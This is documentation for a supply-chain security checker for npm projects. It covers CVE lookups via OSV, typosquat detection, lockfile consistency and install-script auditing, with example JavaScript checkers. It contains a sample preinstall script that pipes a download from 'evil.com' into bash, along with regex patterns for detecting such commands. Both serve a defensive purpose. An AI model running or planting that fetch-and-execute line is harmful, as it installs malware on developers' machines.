Supply Chain Security Checks

Supply chain security checks identify risks in your project's dependencies, including known vulnerabilities, typosquatting attempts, and suspicious package behaviors.

supply-chain-cve

Severity: Critical

What It Detects

Known vulnerabilities (CVEs) in your dependencies using the OSV (Open Source Vulnerabilities) database.

Why It's Dangerous

Dependencies with known CVEs can:

  • Contain remote code execution vulnerabilities
  • Allow denial of service attacks
  • Leak sensitive information
  • Be actively exploited in the wild

Example Finding

Package: lodash@4.17.15
CVE: CVE-2020-8203
Severity: High
Description: Prototype pollution vulnerability
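The lookup behind a finding like the one above can be reproduced directly against the OSV API. The block below is an added example, not the checker's own code: it builds the request body OSV's `/v1/query` endpoint expects for one npm package@version, reduces a response to the OSV id, CVE aliases and summary, and includes a live `queryOsv` helper for when network is available. The sample response at the bottom is constructed (its GHSA id is a placeholder); only CVE-2020-8203 and lodash@4.17.15 come from the finding shown above.

```javascript
// Added example (not the checker's own code): querying OSV for one npm
// dependency and summarising the advisories it returns.
// Endpoint and body shape are those of the public OSV API.
const OSV_QUERY_URL = 'https://api.osv.dev/v1/query';

// Build the JSON body OSV expects for a single package@version.
function buildOsvQuery(name, version) {
  return { version, package: { name, ecosystem: 'npm' } };
}

// Reduce an OSV response to what a finding needs: the OSV id, any CVE
// aliases, and a one-line summary. An empty or absent "vulns" list means
// no known advisory affects this version.
function summariseOsvResponse(response) {
  const vulns = Array.isArray(response.vulns) ? response.vulns : [];
  return vulns.map((v) => ({
    id: v.id,
    cves: (v.aliases || []).filter((a) => a.startsWith('CVE-')),
    summary: v.summary || '',
  }));
}

// Live lookup (needs network): POST the query and summarise the answer.
async function queryOsv(name, version, fetchImpl = globalThis.fetch) {
  const res = await fetchImpl(OSV_QUERY_URL, {
    method: 'POST',
    headers: { 'content-type': 'application/json' },
    body: JSON.stringify(buildOsvQuery(name, version)),
  });
  if (!res.ok) throw new Error(`OSV query failed: HTTP ${res.status}`);
  return summariseOsvResponse(await res.json());
}

// Constructed sample response, shaped like OSV's, for offline use.
// The GHSA id is a placeholder, not a real advisory identifier.
const SAMPLE_RESPONSE = {
  vulns: [
    {
      id: 'GHSA-PLACEHOLDER',
      aliases: ['CVE-2020-8203'],
      summary: 'Prototype pollution in lodash',
    },
  ],
};

function sampleFindings() {
  return summariseOsvResponse(SAMPLE_RESPONSE);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(buildOsvQuery('lodash', '4.17.15')));
  console.log(sampleFindings());
}
```

OSV also offers `/v1/querybatch` for checking a whole lockfile in one request; the per-package body above is what each element of its `queries` array looks like.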

How to Fix

# Update the specific package
npm update lodash
 
# Or update all packages
npm update
 
# Check for available updates
npm outdated
 
# For major version updates
npm install lodash@latest

supply-chain-typosquat

Severity: High

What It Detects

Packages with names similar to popular packages, which may be typosquatting attempts:

  • Character substitution (lodash vs l0dash)
  • Missing/extra characters (express vs expres)
  • Hyphen variations (react-dom vs reactdom)
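The three heuristics listed above can be implemented in a few dozen lines. The following is an added example, not the checker's own code: it normalises look-alike characters, strips hyphens, and uses edit distance to flag dependency names that are one small change away from a well-known package. The "popular" list and the sample package.json are constructed for the example; a real checker would load a much larger list and skip packages the project intentionally depends on.

```javascript
// Added example (not the checker's own code): typosquat heuristics for
// dependency names. POPULAR and SAMPLE_PKG are constructed for illustration.
const POPULAR = ['lodash', 'express', 'react', 'react-dom', 'axios', 'chalk'];

// Characters that read like letters in a terminal or browser (l0dash -> lodash).
const LOOKALIKES = { '0': 'o', '1': 'l', '3': 'e', '5': 's', '$': 's', '@': 'a' };

function normaliseLookalikes(name) {
  return name.replace(/[0135$@]/g, (c) => LOOKALIKES[c]);
}

// Levenshtein edit distance (insert, delete, substitute), single-row form.
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Explain how `name` resembles `popular`, or return null if it does not.
function typosquatReason(name, popular) {
  if (name === popular) return null; // the genuine package
  if (normaliseLookalikes(name) === popular) return 'character substitution';
  if (name.replace(/-/g, '') === popular.replace(/-/g, '')) return 'hyphen variation';
  if (editDistance(name, popular) === 1) return 'missing, extra or changed character';
  return null;
}

// Scan every dependency name in a package.json object against POPULAR.
function findTyposquats(pkg) {
  const names = Object.keys({ ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) });
  const findings = [];
  for (const name of names) {
    for (const popular of POPULAR) {
      const reason = typosquatReason(name, popular);
      if (reason) findings.push({ package: name, similarTo: popular, reason });
    }
  }
  return findings;
}

// Constructed sample manifest (not a real project).
const SAMPLE_PKG = {
  dependencies: { expresss: '^4.18.0', l0dash: '^4.17.21', reactdom: '^18.0.0', axios: '^1.6.0' },
};

if (typeof require !== 'undefined' && require.main === module) {
  console.table(findTyposquats(SAMPLE_PKG));
}
```

Edit distance 1 catches more than a missing or extra letter (any single substitution also qualifies), so the last reason is worded accordingly; the genuine package name itself is never reported.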

Why It's Dangerous

Typosquatted packages can:

  • Contain malicious code
  • Steal credentials
  • Install backdoors
  • Mine cryptocurrency

Example Finding

Package: expresss (note extra 's')
Similar to: express (popular package)
Action: Verify this is the intended package

How to Fix

  1. Verify package names before installing
  2. Check npm page for package legitimacy
  3. Compare download counts with known packages
  4. Remove suspicious packages:
npm uninstall expresss
npm install express

supply-chain-excessive-deps

Severity: Medium

What It Detects

Projects with a high number of dependencies:

  • Warning at 50+ production dependencies
  • Warning at 100+ total dependencies

Why It's Concerning

Many dependencies:

  • Increase the attack surface
  • Introduce more potential vulnerabilities
  • Are harder to audit and update
  • Slow down install and build times

How to Address

# Analyze dependency tree
npm ls --depth=0
 
# Find unused dependencies
npx depcheck
 
# Remove unused packages
npm uninstall unused-package

Consider:

  • Consolidating overlapping functionality
  • Using built-in Node.js APIs where possible
  • Evaluating if each dependency is necessary

supply-chain-lockfile

Severity: Medium

What It Detects

Missing or inconsistent lock files:

  • No package-lock.json or yarn.lock
  • Lock file out of sync with package.json
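Both conditions above can be checked from the two files alone. The block below is an added example, not the checker's own code. It assumes the npm lockfile v2/v3 layout, in which `packages[""]` mirrors the manifest's dependency ranges and `packages["node_modules/<name>"]` records each resolved version with its integrity hash; it reports a missing lock, ranges that differ between package.json and the lock root (the mismatch that makes `npm ci` refuse to install), dependencies with no resolved version or no integrity hash, and stale entries the manifest no longer declares. The manifests at the bottom are constructed.

```javascript
// Added example (not the checker's own code): package-lock.json presence and
// consistency check against package.json, assuming lockfile v2/v3 layout.
function checkLockfile(pkg, lock) {
  const findings = [];
  if (!lock) {
    findings.push({ kind: 'missing-lockfile', detail: 'no package-lock.json found' });
    return findings;
  }
  const packages = lock.packages || {};
  const root = packages[''] || {};

  for (const field of ['dependencies', 'devDependencies']) {
    const declared = pkg[field] || {};
    const locked = root[field] || {};

    for (const [name, range] of Object.entries(declared)) {
      // The range in package.json must match what the lock root recorded.
      if (!(name in locked)) {
        findings.push({ kind: 'not-in-lock', detail: `${name} is declared in package.json but missing from the lock root` });
      } else if (locked[name] !== range) {
        findings.push({ kind: 'range-mismatch', detail: `${name}: package.json wants ${range}, lock root has ${locked[name]}` });
      }
      // The lock must also pin a concrete version and carry an integrity hash.
      const entry = packages[`node_modules/${name}`];
      if (!entry || !entry.version) {
        findings.push({ kind: 'not-resolved', detail: `${name} has no resolved version in the lock` });
      } else if (!entry.integrity) {
        findings.push({ kind: 'no-integrity', detail: `${name}@${entry.version} has no integrity hash` });
      }
    }

    // Entries the lock root still lists but package.json no longer declares.
    for (const name of Object.keys(locked)) {
      if (!(name in declared)) {
        findings.push({ kind: 'stale-in-lock', detail: `${name} is in the lock root but not in package.json` });
      }
    }
  }
  return findings;
}

// Read both files from a project directory; a missing lock yields null.
function readManifests(dir) {
  const fs = require('node:fs');
  const path = require('node:path');
  const read = (f) => (fs.existsSync(path.join(dir, f)) ? JSON.parse(fs.readFileSync(path.join(dir, f), 'utf8')) : null);
  return { pkg: read('package.json'), lock: read('package-lock.json') };
}

// Constructed sample: the manifest was edited after the lock was generated.
const MANIFEST = {
  dependencies: { lodash: '^4.17.21', express: '^4.18.2' },
  devDependencies: { jest: '^29.0.0' },
};
const LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { dependencies: { lodash: '^4.17.15', express: '^4.18.2', 'left-pad': '^1.3.0' }, devDependencies: {} },
    'node_modules/lodash': { version: '4.17.15', integrity: 'sha512-CONSTRUCTED' },
    'node_modules/express': { version: '4.18.2' },
    'node_modules/left-pad': { version: '1.3.0', integrity: 'sha512-CONSTRUCTED' },
  },
};
// Constructed sample that is in sync.
const CLEAN_MANIFEST = { dependencies: { lodash: '^4.17.21' } };
const CLEAN_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { dependencies: { lodash: '^4.17.21' } },
    'node_modules/lodash': { version: '4.17.21', integrity: 'sha512-CONSTRUCTED' },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  const { pkg, lock } = process.argv[2] ? readManifests(process.argv[2]) : { pkg: MANIFEST, lock: LOCK };
  for (const f of checkLockfile(pkg, lock)) console.log(`${f.kind}: ${f.detail}`);
}
```

Run it with a project directory as the first argument to check real files, or with no argument to see the constructed case. A lockfile v1 file has no `packages` map, so every dependency would be reported as not resolved; regenerating the lock with a current npm is the fix in that case.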

Why It's Important

Lock files ensure:

  • Reproducible builds
  • Same versions across environments
  • Protection against dependency confusion
  • Verification of package integrity

How to Fix

# Generate lock file
npm install
 
# Commit the lock file
git add package-lock.json
git commit -m "Add package-lock.json"

supply-chain-scripts

Severity: High

What It Detects

Suspicious package scripts in package.json:

  • preinstall scripts that run before installation
  • postinstall scripts that run arbitrary code
  • Scripts that download or execute external resources

Why It's Dangerous

Malicious scripts can:

  • Execute during npm install
  • Run before you review the code
  • Download and execute malware
  • Steal environment variables

Example Dangerous Scripts

{
  "scripts": {
    "preinstall": "curl http://evil.com/malware.sh | bash",
    "postinstall": "node ./setup.js"
  }
}
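A scanner for the scripts block can flag both the hooks themselves and the patterns the text describes. The following is an added example, not the checker's own code: it reports every lifecycle hook that runs during `npm install`, then raises a high-severity finding when such a hook fetches a remote resource, pipes a download into a shell, evaluates inline code or decodes an embedded payload. The pattern names, severities and sample manifest (built from the dangerous scripts shown above plus an ordinary `test` script) are this example's own.

```javascript
// Added example (not the checker's own code): flagging package.json scripts
// that run automatically on install and show suspicious patterns.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'preuninstall', 'postuninstall'];

const SUSPICIOUS_PATTERNS = [
  // a download piped straight into a shell interpreter
  { name: 'remote-pipe-to-shell', re: /\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b/ },
  // any remote URL referenced from a script
  { name: 'remote-url', re: /https?:\/\//i },
  // inline code evaluation
  { name: 'inline-eval', re: /\beval\b|\bnode\s+(-e|--eval)\b/ },
  // a base64-decoded payload
  { name: 'encoded-payload', re: /\bbase64\b.*(-d|--decode)\b/ },
];

// One finding per lifecycle hook, plus one per suspicious pattern matched.
function auditScripts(pkg) {
  const findings = [];
  for (const [script, command] of Object.entries(pkg.scripts || {})) {
    const isLifecycle = LIFECYCLE_HOOKS.includes(script);
    if (isLifecycle) {
      findings.push({ script, severity: 'info', reason: 'lifecycle-hook', command });
    }
    for (const { name, re } of SUSPICIOUS_PATTERNS) {
      if (re.test(command)) {
        // The same pattern is worse when it runs unattended during install.
        findings.push({ script, severity: isLifecycle ? 'high' : 'medium', reason: name, command });
      }
    }
  }
  return findings;
}

// True when the package should be installed with --ignore-scripts until reviewed.
function recommendIgnoreScripts(findings) {
  return findings.some((f) => f.severity === 'high');
}

// Constructed sample manifest: the dangerous scripts from the section plus a normal one.
const SAMPLE_MANIFEST = {
  scripts: {
    preinstall: 'curl http://evil.com/malware.sh | bash',
    postinstall: 'node ./setup.js',
    test: 'jest',
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  const findings = auditScripts(SAMPLE_MANIFEST);
  console.table(findings);
  console.log('install with --ignore-scripts:', recommendIgnoreScripts(findings));
}
```

On the sample manifest the `preinstall` hook produces three findings (the hook itself, the pipe to a shell, and the remote URL) and `postinstall` produces only the informational hook finding, which is what leaves `./setup.js` for manual review.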

How to Address

  1. Review scripts before installing
  2. Use npm install --ignore-scripts initially
  3. Audit setup.js or similar scripts
  4. Consider if the script is necessary

Summary

| Check | Severity | Key Fix |
|-------|----------|---------|
| supply-chain-cve | Critical | Update vulnerable dependencies |
| supply-chain-typosquat | High | Verify package names |
| supply-chain-excessive-deps | Medium | Reduce unnecessary dependencies |
| supply-chain-lockfile | Medium | Commit lock files |
| supply-chain-scripts | High | Review package scripts |

Best Practices

1. Regular Updates

# Check for updates weekly
npm outdated
 
# Update regularly
npm update

2. Use npm Audit

# Check for vulnerabilities
npm audit
 
# Auto-fix where possible
npm audit fix

3. Lock Dependencies

{
  "engines": {
    "node": ">=18.0.0"
  }
}

4. Review New Dependencies

Before adding a package:

  • Check npm download counts
  • Review GitHub stars and activity
  • Look at the maintainer's reputation
  • Scan for known vulnerabilities

Next Steps